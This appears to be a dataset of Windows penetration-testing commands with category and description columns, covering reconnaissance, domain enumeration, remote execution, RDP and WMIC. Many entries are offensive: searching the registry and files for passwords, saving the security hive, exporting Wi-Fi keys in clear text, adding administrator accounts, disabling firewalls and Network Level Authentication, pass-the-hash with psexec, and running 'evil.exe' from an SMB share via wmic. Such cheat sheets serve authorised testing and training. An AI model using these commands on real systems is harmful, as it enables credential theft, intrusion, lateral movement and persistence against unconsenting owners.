category
stringclasses
51 values
command
stringlengths
1
755
description
stringlengths
3
70
Windows System Info Commands
reg query HKLM /f password /t REG_SZ /s
Search registry for password
Windows System Info Commands
fsutil fsinfo drives
List drives (must be admin)
Windows System Info Commands
dir /a /s /b c:\*.pdf
Search for all PDFs
Windows System Info Commands
dir /a /b c:\windows\kb*
Search for patches
Windows System Info Commands
findstr /si password *.txt *.xml *.xls
Search files for password
Windows System Info Commands
tree /F /A c:\ > tree.txt
Directory listing of C:
Windows System Info Commands
reg save HKLM\Security security.hive
Save security hive to file
Windows System Info Commands
echo %USERNAME%
Current user
Windows Net/Domain Commands
net view /domain
Hosts in current domain
Windows Net/Domain Commands
net view /domain:MYDOMAIN
Hosts in MYDOMAIN
Windows Net/Domain Commands
net user /domain
All users in current domain
Windows Net/Domain Commands
net user user pass /add
Add user
Windows Net/Domain Commands
net localgroup "Administrators" user /add
Add user to Administrators
Windows Net/Domain Commands
net accounts /domain
Domain password policy
Windows Net/Domain Commands
net localgroup "Administrators"
List local Admins
Windows Net/Domain Commands
net group /domain
List domain groups
Windows Net/Domain Commands
net group "Domain Admins" /domain
List users in Domain Admins
Windows Net/Domain Commands
net group "Domain Controllers" /domain
List DCs for current domain
Windows Net/Domain Commands
net share
Current SMB shares
Windows Net/Domain Commands
net session | find "\\"
Active SMB sessions
Windows Net/Domain Commands
net user user /ACTIVE:yes /domain
Unlock domain user account
Windows Net/Domain Commands
net user user newpassword /domain
Change domain user password
Windows Net/Domain Commands
net share share c:\share /GRANT:Everyone,FULL
Share folder
Windows Remote Commands
tasklist /S ip /v
Remote process listing
Windows Remote Commands
systeminfo /S ip /U domain\user /P pwd
Remote system info
Windows Remote Commands
net share \\ip
Shares of remote computer
Windows Remote Commands
net use \\ip
Remote filesystem (IPC$)
Windows Remote Commands
net use z: \\ip\share password /user:DOMAIN\user
Map drive with specified credentials
Windows Remote Commands
reg add \\ip\regkey\value
Add registry key remotely
Windows Remote Commands
sc \\ip create service binpath=C:\Windows\System32\x.exe start=auto
Create a remote service (space after start=)
Windows Remote Commands
xcopy /s \\ip\dir C:\local
Copy remote folder
Windows Remote Commands
shutdown /m \\ip /r /t 0 /f
Remotely reboot machine
Windows Network Commands
ipconfig /all
IP configuration
Windows Network Commands
ipconfig /displaydns
Local DNS cache
Windows Network Commands
netstat -ana
Open connections
Windows Network Commands
netstat -anop tcp
Netstat loop
Windows Network Commands
netstat -ano | findstr LISTENING
LISTENING ports
Windows Network Commands
route print
Routing table
Windows Network Commands
arp -a
Known MACs (ARP table)
Windows Network Commands
nslookup set type=any ls -d domain > results.txt exit
DNS Zone Xfer
Windows Network Commands
nslookup -type=SRV _www._tcp.url.com
Domain SRV lookup (ldap, kerberos, sip)
Windows Network Commands
tftp -i ip GET remotefile
TFTP file transfer
Windows Network Commands
netsh wlan show profiles
Saved wireless profiles
Windows Network Commands
netsh firewall set opmode disable
Disable firewall (Old)
Windows Network Commands
netsh wlan export profile folder=. key=clear
Export wifi plaintext password
Windows Network Commands
netsh interface ip show interfaces
List interface IDs/MTUs
Windows Network Commands
netsh interface ip set address local static ip nmask gw ID
Set IP
Windows Network Commands
netsh interface ip set dns local static ip
Set DNS server
Windows Network Commands
netsh interface ip set address local dhcp
Set interface to use DHCP
Windows Utility Commands
type file
Display file contents
Windows Utility Commands
del path\*.* /a /s /q /f
Forcibly delete all files in path
Windows Utility Commands
find /I "str" filename
Find "str" in file
Windows Utility Commands
command | find /c /v ""
Line count of command output
Windows Utility Commands
at HH:MM file [args]
Schedule file to run (e.g., at 14:45 cmd /c)
Windows Utility Commands
runas /user:user "file [args]"
Run file as user
Windows Utility Commands
shutdown /r /t 0
Restart now
Windows Utility Commands
tr -d '\15\32' win.txt > unix.txt
Removes CR & LF (Unix conversion)
Windows Utility Commands
makecab file
Native compression
Windows Utility Commands
wusa.exe /uninstall /kb:###
Uninstall patch
Windows Utility Commands
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"
CLI Event Viewer
Windows Utility Commands
lusrmgr.msc
Local user manager
Windows Utility Commands
services.msc
Services control panel
Windows Utility Commands
taskmgr.exe
Task manager
Windows Utility Commands
secpol.msc
Security policy manager
Windows Utility Commands
eventvwr.msc
Event viewer
Misc. Commands
rundll32.dll user32.dll LockWorkstation
Lock workstation
Misc. Commands
netsh advfirewall set currentprofile state off
Disable Windows firewall (current profile)
Misc. Commands
netsh advfirewall set allprofiles state off
Disable Windows firewall (all profiles)
Misc. Commands
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2
Native Windows port forward (must be admin)
Misc. Commands
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1
Remove port forward
Misc. Commands
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
Re-enable command prompt
Misc. Commands
psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe
Execute file hosted on remote system with credentials
Misc. Commands
psexec /accepteula \\ip -u Domain\user -p NTLM_hash cmd.exe /c c:\ProgramData\command
Run remote command with specified hash
Misc. Commands
psexec /accepteula \\ip -s cmd.exe
Run remote command as SYSTEM
Terminal Services (RDP)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable RDP
Terminal Services (RDP)
net start termservice
Start Terminal Services
Terminal Services (RDP)
sc config termservice start=auto
Set Terminal Services to start automatically
Terminal Services (RDP)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
Tunnel RDP out port 443 (may need restart)
Terminal Services (RDP)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Disable Network Level Authentication
Terminal Services (RDP)
netsh firewall set service type=remotedesktop mode=enable
Add firewall exception for RDP
Terminal Services (RDP)
schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f
Import a schedule task from XML
WMIC
wmic [alias] get /?
List all attributes
WMIC
wmic [alias] call /?
List callable methods
WMIC
wmic process list full
Process attributes
WMIC
wmic startup
List startup services
WMIC
wmic service
List services
WMIC
wmic ntdomain list
Domain and DC info
WMIC
wmic qfe
List all patches
WMIC
wmic process call create "process_name"
Execute process
WMIC
wmic process where name="process" call terminate
Terminate process
WMIC
wmic logicaldisk get description,name
View logical shares
WMIC
wmic cpu get DataWidth /format:list
Display 32 or 64 bit
WMIC
wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\evil.exe"
Execute file hosted over SMB with credentials
WMIC
wmic product get name /value
Get software names
WMIC
wmic product where name="XXX" call uninstall /nointeractive
Uninstall software
WMIC
wmic /node:remotecomputer computersystem get username
Remotely determine logged-in user
WMIC
wmic /node:machinename process list brief /every:1
Remote process listing every second
WMIC
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
Remotely start RDP
WMIC
wmic netlogin where (name like "%adm%") get numberoflogons
List number of times user has logged on
WMIC
wmic service get name,displayname,pathname,startmode | findstr /i auto | findstr /i /v "C:\windows\\" | findstr /i /v """
Search for services with unquoted paths